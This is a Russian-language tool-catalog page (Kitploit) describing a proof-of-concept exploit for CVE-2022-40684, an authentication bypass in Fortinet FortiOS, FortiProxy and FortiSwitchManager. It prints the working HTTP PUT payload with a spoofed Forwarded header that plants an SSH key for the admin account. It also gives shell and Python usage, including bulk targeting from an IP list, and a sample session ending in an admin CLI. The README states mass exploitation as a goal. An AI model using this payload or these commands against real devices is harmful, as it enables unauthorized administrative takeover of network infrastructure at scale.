Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-40684 — Эксплойт доказательства концепции для уязвимости CVE-2022-40684 (обход аутентификации) в Fortinet FortiOS, FortiProxy и FortiSwitchManager. Внедряет SSH-ключи через специально сформированный HTTP PUT-запрос для получения доступа администратора. | Kitploit
Инструменты/GitHubGitHub/iveresk/cve-2022-40684
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubiveresk/cve-2022-40684

CVE-2022-40684

Эксплойт доказательства концепции для уязвимости CVE-2022-40684 (обход аутентификации) в Fortinet FortiOS, FortiProxy и FortiSwitchManager. Внедряет SSH-ключи через специально сформированный HTTP PUT-запрос для получения доступа администратора.

Репозиторий
113 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-40684 от 1vere$k

Пока это копия POC для CVE-2022-40684, затрагивающего устройства Fortinet FortiOS, FortiProxy и FortiSwitchManager.
Скопировано из https://github.com/horizon3ai/CVE-2022-40684

Анализ

Эксплойт использует простой payload:

root@kitploit:~
		PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
        Content-Length: 610
        {
        "ssh-public-key1": "fake-key"
        }

Краткое описание

Этот POC использует уязвимость обхода аутентификации для установки SSH-ключа для указанного пользователя.

Планы на будущее

Разработать полноценный эксплойт с множеством целей и серверов для массовой эксплуатации.

Использование CLI

root@kitploit:~
1. chmod +x cve-2022-40684.sh
2. ./cve-2022-40684 <TARGET_IP>
 or
2. ./cve-2022-40684 <FILE_NAME>

Пример:
./cve-2022-40684.sh ips.txt

Использование Py

python3 CVE-2022-40684.py -t <TARGET_IP> --username admin --key-file ~/.ssh/id_rsa.pub
Пример:

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.
Скачать инструмент